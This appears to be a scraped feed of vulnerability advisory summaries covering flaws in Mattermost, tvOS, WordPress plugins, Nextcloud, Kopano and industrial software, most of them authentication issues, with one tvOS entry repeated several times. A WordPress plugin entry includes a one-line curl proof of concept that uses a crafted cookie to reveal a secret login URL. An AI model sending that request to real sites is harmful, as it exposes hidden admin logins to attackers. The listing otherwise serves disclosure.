CVE-2022-1982 A crafted SVG attachment can crash a Mattermost server

Uncontrolled resource consumption in Mattermost version 6.6.0 and earlier allows an authenticated attacker to crash the server via a crafted SVG attachment on a post...

CVE-2022-26724

An authentication issue was addressed with improved state management. This issue is fixed in tvOS 15.5. A local user may be able to enable iCloud Photos without authentication...

CVE-2022-26724

An authentication issue was addressed with improved state management. This issue is fixed in tvOS 15.5. A local user may be able to enable iCloud Photos without authentication...

CVE-2022-26724

An authentication issue was addressed with improved state management. This issue is fixed in tvOS 15.5. A local user may be able to enable iCloud Photos without authentication...

CVE-2022-26724

The CVE-2022-26724 issue affects tvOS and is described as an authentication issue that was addressed with improved state management. It is fixed in tvOS 15.5, where a local user may previously have been able to enable iCloud Photos without authentication. The Apple security content entry for tvOS...

CVE-2022-26724

An authentication issue was addressed with improved state management. This issue is fixed in tvOS 15.5. A local user may be able to enable iCloud Photos without authentication...

CVE-2022-29446 WordPress Counter Box plugin <= 1.1.1 - Authenticated Local File Inclusion (LFI) vulnerability

Authenticated administrator or higher role Local File Inclusion LFI vulnerability in Wow-Company's Counter Box plugin = 1.1.1 at WordPress...

HC Custom WP-Admin URL <= 1.4 - Unauthenticated Secret URL Disclosure

The plugin leaks the secret login URL when sending a specific crafted request PoC curl -sIXGET -H "Cookie: validloginslug=1" https://example.com/wp-login.php HTTP/2 302 x-redirect-by: WordPress location: secret...

CVE-2022-21151

Processor optimization removal or modification of security-critical code for some IntelR Processors may allow an authenticated user to potentially enable information disclosure via local access...

CVE-2021-34590

In Bender/ebee Charge Controllers in multiple versions are prone to Cross-site Scripting. An authenticated attacker could write HTML Code into configuration values. These values are not properly escaped when displayed...

CVE-2022-24885 Improper Authentication in Nextcloud Android Files

Nextcloud Android app is the Android client for Nextcloud, a self-hosted productivity platform. Prior to version 3.19.1, users can bypass a lock on the Nextcloud app on an Android device by repeatedly reopening the app. Version 3.19.1 contains a fix for the problem. There are currently no known...

PT-2022-9182 · Red Hat · Wildfly Elytron

Name of the Vulnerable Software and Affected Versions: WildFly Elytron affected versions not specified Description: A flaw was found in WildFly Elytron, related to a session fixation exploit when using Undertow, despite Undertow switching the session ID after authentication. Recommendations: At t...

SUSE-SU-2022:0743-2 Security update for cyrus-sasl

This update for cyrus-sasl fixes the following issues: - CVE-2022-24407: Fixed SQL injection in sqlauxpropstore in plugins/sql.c bsc1196036. The following non-security bugs were fixed: - postfix: sasl authentication with password fails bsc1194265...

CVE-2020-14479 ICSA-20-147-01 Inductive Automation Ignition (Update B)

Sensitive information can be obtained through the handling of serialized data. The issue results from the lack of proper authentication required to query the server...

CVE-2022-0922 ICSMA-22-088-01 Philips e-Alert

The software does not perform any authentication for critical system functionality...

CVE-2022-26562

An issue in provider/libserver/ECKrbAuth.cpp of Kopano Core = 6.30 introduced between 6.30.0 RC1e and 6.30.8 final...

PT-2022-17932 · Zarafa +3 · Zarafa Collaboration Platform +3

Name of the Vulnerable Software and Affected Versions: Kopano Core versions 11.0.2.51 and earlier Zarafa Collaboration Platform versions 6.30 through 6.30.8 Description: The issue allows attackers to authenticate even if the user account or password is expired. This is due to a problem in the...

CVE-2021-45900

Vivoh Webinar Manager before 3.6.3.0 has improper API authentication. When a user logs in to the administration configuration web portlet, a VIVOHAUTH cookie is assigned so that they can be uniquely identified. Certain APIs can be successfully executed without proper authentication. This can let ...

UBUNTU-CVE-2022-0996

A vulnerability was found in the 389 Directory Server that allows expired passwords to access the database to cause improper authentication...

CVE-2021-27464 Rockwell Automation FactoryTalk AssetCentre SQL Injection

The ArchiveService.rem service in Rockwell Automation FactoryTalk AssetCentre v10.00 and earlier exposes functions lacking proper authentication. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary SQL statements...